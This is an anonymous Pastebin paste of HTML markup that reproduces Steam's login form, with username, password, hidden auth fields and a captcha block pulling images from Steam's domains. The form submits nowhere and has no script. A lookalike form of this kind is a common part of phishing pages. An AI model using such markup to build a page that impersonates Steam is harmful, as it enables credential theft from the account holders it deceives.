Advertisement
Guest User

Untitled

a guest
Jul 16th, 2019
100
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 1.95 KB | None | 0 0
  1. <form action="#" method="POST" name="logon" id="loginForm">
  2. <input type="hidden" name="emailauth" id="emailauth" value="">
  3. <input type="hidden" name="emailsteamid" id="emailsteamid">
  4. <input type="hidden" name="loginfriendlyname" id="loginfriendlyname" value="">
  5. <div>Steam username</div>
  6. <input class="textField" type="text" name="username" id="steamAccountName" autofocus="" maxlength="64"><br>
  7. &nbsp;
  8. <br>
  9. <div>Password</div>
  10. <input class="textField" type="password" name="password" id="steamPassword" autocomplete="off" maxlength="64"><br>
  11. <br>
  12. <div id="captcha_entry" class="captcha_oauth" style="display: none;">
  13. <input type="hidden" id="captchagid" name="captchagid" value="-1">
  14. <div id="CaptchaFormArea">
  15. <div>Type these characters below</div>
  16. <img id="captchaImg" src="https://steamcommunity.com/public/captcha.php?gid=-1" border="0"><br>
  17. <div id="captchaRefresh"><img src="https://steamcommunity-a.akamaihd.net/public/images//skin_1/blue_refresh_icon.png" id="captchaRefreshImg" border="0" onclick="RefreshCaptcha();return false;">&nbsp;<a href="#" id="captchaRefreshLink" title="Refresh" onclick="RefreshCaptcha();return false;">Refresh</a></div>
  18. <input class="textField" type="text" name="captcha_text" id="input_captcha" autocomplete="off"><br>
  19. <div class="smallLabel" id="captchaExplanation">Are you human or robot?</div>
  20. <br>
  21. </div>
  22. </div>
  23. <div id="login_btn_signin">
  24. <input class="btn_green_white_innerfade" type="submit" id="imageLogin" style="width:104px; height:34px; border:none; font-size: 15px;" value="Sign In">
  25. </div>
  26. <br>
  27. <div id="login_btn_wait" style="display: none;">
  28. <img src="https://steamcommunity-a.akamaihd.net/public/images/login/throbber.gif">
  29. </div>
  30. <br clear="all">
  31. </form>
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement